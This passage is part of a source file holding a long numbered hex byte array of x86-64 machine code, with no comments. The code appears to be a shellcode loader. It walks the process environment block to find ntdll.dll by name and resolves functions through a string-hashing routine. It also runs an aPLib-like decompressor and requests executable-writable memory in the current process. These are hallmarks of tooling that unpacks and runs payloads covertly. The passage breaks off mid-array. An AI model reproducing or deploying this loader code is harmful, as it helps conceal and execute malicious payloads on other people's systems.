2019 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1f, 0x0e,
2020 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79, 0x0a, 0xb8,
2021 0x00, 0x00, 0x00, 0x00, 0xe9, 0x4c, 0x01, 0x00, 0x00, 0x8b, 0x55, 0xe4,
2022 0x48, 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x86, 0xfe,
2023 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x32, 0x06, 0x00, 0x00, 0x44, 0x8b,
2024 0x45, 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2025 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48,
2026 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
2027 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc0, 0x0d, 0x00,
2028 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xac, 0x05, 0x00, 0x00,
2029 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89,
2030 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9d, 0xad, 0xff,
2031 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a,
2032 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc7, 0x00, 0x00, 0x00, 0x48, 0x8d,
2033 0x05, 0x68, 0xfe, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x3c, 0xfe, 0xff, 0xff,
2034 0x48, 0x29, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79,
2035 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa2, 0x00, 0x00, 0x00, 0x48,
2036 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89,
2037 0x45, 0xd0, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2038 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48,
2039 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89,
2040 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
2041 0x21, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79,
2042 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x51, 0x8b, 0x55, 0xe4, 0x48,
2043 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfd, 0xff,
2044 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x37, 0x05, 0x00, 0x00, 0x44, 0x8b, 0x45,
2045 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55,
2046 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48, 0x89,
2047 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
2048 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc5, 0x0c, 0x00, 0x00,
2049 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55,
2050 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x01, 0x00, 0x00, 0x00,
2051 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89,
2052 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
2053 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x3c,
2054 0x03, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x7f,
2055 0xaf, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48,
2056 0x8d, 0x90, 0xbc, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9,
2057 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2058 0x4d, 0x10, 0xe8, 0x53, 0xac, 0xff, 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48,
2059 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2060 0xa7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8,
2061 0x48, 0xc7, 0x45, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xd0,
2062 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24,
2063 0x28, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
2064 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2065 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xfb, 0x0b, 0x00, 0x00, 0x89, 0x45,
2066 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2067 0xeb, 0x55, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xe0, 0x05, 0x00,
2068 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48,
2069 0x89, 0xc1, 0xe8, 0x0d, 0x04, 0x00, 0x00, 0x44, 0x8b, 0x45, 0xe0, 0x48,
2070 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48,
2071 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54, 0x24,
2072 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2073 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x9b, 0x0b, 0x00, 0x00, 0xb8, 0x01,
2074 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x90, 0x90, 0x90,
2075 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2076 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10,
2077 0x8b, 0x40, 0x14, 0x8d, 0x48, 0xff, 0x48, 0x8b, 0x55, 0x10, 0x89, 0x4a,
2078 0x14, 0x85, 0xc0, 0x75, 0x2a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x00,
2079 0x48, 0x8d, 0x48, 0x01, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x0a, 0x0f,
2080 0xb6, 0x00, 0x0f, 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10,
2081 0x48, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x14, 0x07, 0x00, 0x00, 0x00, 0x48,
2082 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01,
2083 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8d, 0x14,
2084 0x00, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10, 0x8b, 0x45, 0xfc, 0x48,
2085 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x83, 0xec, 0x38, 0x48,
2086 0x8d, 0x6c, 0x24, 0x30, 0x48, 0x89, 0x4d, 0x20, 0xc7, 0x45, 0xfc, 0x01,
2087 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8b, 0x4d,
2088 0x20, 0xe8, 0x66, 0xff, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x48,
2089 0x8b, 0x4d, 0x20, 0xe8, 0x58, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdf,
2090 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x38, 0x5b, 0x5d, 0xc3, 0x55, 0x53,
2091 0x48, 0x83, 0xec, 0x58, 0x48, 0x8d, 0x6c, 0x24, 0x50, 0x48, 0x89, 0x4d,
2092 0x20, 0x48, 0x89, 0x55, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45,
2093 0xd0, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xe4,
2094 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0xff, 0xff, 0xff, 0xff, 0xc7,
2095 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
2096 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45,
2097 0xd0, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d,
2098 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x41, 0x02, 0x00, 0x00, 0x48,
2099 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xdd, 0xfe, 0xff, 0xff, 0x85,
2100 0xc0, 0x0f, 0x84, 0x09, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48,
2101 0x89, 0xc1, 0xe8, 0xc9, 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xf9,
2102 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xb5,
2103 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x76, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2104 0x00, 0x00, 0xc7, 0x45, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b,
2105 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1,
2106 0xe8, 0x8f, 0xfe, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x83, 0x6d,
2107 0xe8, 0x01, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0xdf, 0x83, 0x7d, 0xfc, 0x00,
2108 0x74, 0x24, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2109 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2110 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2111 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89,
2112 0x55, 0xd8, 0xc6, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2113 0xe9, 0x93, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50,
2114 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x89,
2115 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xe0, 0x01, 0x83, 0xc0, 0x02, 0x89,
2116 0x45, 0xf8, 0xd1, 0x6d, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x74, 0x30, 0xeb,
2117 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2118 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2119 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2120 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xeb, 0x07, 0xc7,
2121 0x45, 0xec, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x89, 0x45, 0xf4,
2122 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x01, 0x00, 0x00,
2123 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x31, 0xfe, 0xff, 0xff,
2124 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x4e, 0x83, 0x7d, 0xfc,
2125 0x02, 0x75, 0x48, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xfc, 0x48, 0x8d, 0x45,
2126 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x10, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
2127 0xeb, 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2128 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2129 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2130 0x83, 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xe9, 0x90,
2131 0x00, 0x00, 0x00, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x06, 0x83, 0x6d, 0xfc,
2132 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xfc, 0x02, 0xc1, 0x65, 0xfc, 0x08, 0x48,
2133 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f,
2134 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xfc, 0x48, 0x8d, 0x45, 0xd0,
2135 0x48, 0x89, 0xc1, 0xe8, 0xa5, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf8, 0x81,
2136 0x7d, 0xfc, 0xff, 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8, 0x01,
2137 0x81, 0x7d, 0xfc, 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8,
2138 0x01, 0x83, 0x7d, 0xfc, 0x7f, 0x77, 0x2c, 0x83, 0x45, 0xf8, 0x02, 0xeb,
2139 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2140 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2141 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2142 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0x8b, 0x45, 0xfc,
2143 0x89, 0x45, 0xf4, 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x24,
2144 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45, 0xd0,
2145 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d, 0xd8,
2146 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2147 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0xb5, 0xfd, 0xff, 0xff, 0x48, 0x8b,
2148 0x45, 0xd8, 0x48, 0x2b, 0x45, 0x28, 0x48, 0x83, 0xc4, 0x58, 0x5b, 0x5d,
2149 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2150 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
2151 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48,
2152 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x10, 0x8b, 0x45, 0x18,
2153 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8,
2154 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2155 0x75, 0xe3, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2156 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
2157 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10,
2158 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0,
2159 0xeb, 0x17, 0x48, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45,
2160 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0,
2161 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2162 0x75, 0xdc, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2163 0x55, 0x56, 0x53, 0x48, 0x8d, 0x2c, 0x24, 0x48, 0x89, 0x4d, 0x20, 0x48,
2164 0x89, 0x55, 0x28, 0x44, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48,
2165 0x8b, 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01,
2166 0x0f, 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6,
2167 0x00, 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10,
2168 0x48, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8,
2169 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
2170 0x12, 0x8b, 0x45, 0x30, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x30, 0x85, 0xc0,
2171 0x75, 0xbb, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55,
2172 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
2173 0x23, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18,
2174 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2175 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01,
2176 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0b, 0x48,
2177 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x48, 0x8b,
2178 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f, 0xb6,
2179 0xc0, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
2180 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x31, 0x48, 0x8b, 0x45,
2181 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x38,
2182 0xc2, 0x75, 0x1a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2183 0x4d, 0x10, 0xe8, 0x74, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x06, 0x48,
2184 0x8b, 0x45, 0x10, 0xeb, 0x15, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x8b,
2185 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc4, 0xb8, 0x00, 0x00,
2186 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
2187 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x1c, 0x48, 0x8b,
2188 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
2189 0x38, 0xc2, 0x75, 0x22, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2190 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2191 0x0e, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xce,
2192 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f, 0xbe,
2193 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xbe, 0xc8, 0x89,
2194 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
2195 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x2b, 0x48, 0x8b, 0x45, 0x10, 0x0f,
2196 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x0f,
2197 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00,
2198 0x00, 0x00, 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2199 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2200 0x0b, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xbf,
2201 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0,
2202 0x0f, 0xb6, 0xc0, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2203 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2204 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0xc7, 0x45, 0xfc, 0x00,
2205 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26, 0xeb, 0x28,
2206 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x89, 0xc2, 0x48,
2207 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45,
2208 0xf6, 0x0f, 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01,
2209 0xd0, 0x31, 0x45, 0xf8, 0x8b, 0x55, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x48,
2210 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x8b, 0x45, 0xf8,
2211 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec, 0xc8,
2212 0x00, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x48,
2213 0x89, 0x4d, 0x20, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x85, 0xc0, 0x74,
2214 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x03, 0x00, 0x00, 0xc7,
2215 0x85, 0x74, 0xff, 0xff, 0xff, 0x60, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x74,
2216 0xff, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x85, 0x68, 0xff,
2217 0xff, 0xff, 0x48, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff, 0x48, 0x89, 0x45,
2218 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45,
2219 0xc8, 0x48, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45,
2220 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8, 0x48, 0x8b, 0x40,
2221 0x10, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x8b,
2222 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b,
2223 0x45, 0xf0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x8b, 0x40,
2224 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48,
2225 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xb8, 0x48, 0x05, 0x88, 0x00, 0x00,
2226 0x00, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b, 0x00, 0x89,
2227 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00, 0x74, 0x4c, 0x8b, 0x55, 0xac, 0x48,
2228 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
2229 0x45, 0xf8, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2230 0x01, 0xd0, 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8b, 0x45, 0xa0, 0x8b, 0x00,
2231 0x0d, 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x1b,
2232 0x48, 0x8b, 0x45, 0xa0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20,
2233 0x20, 0x20, 0x20, 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x24, 0xeb, 0x04,
2234 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x00, 0x48,
2235 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48,
2236 0x85, 0xc0, 0x0f, 0x85, 0x4e, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90, 0x48,
2237 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2238 0x6f, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18, 0x89,
2239 0x45, 0xe4, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48,
2240 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8b,
2241 0x45, 0xf8, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
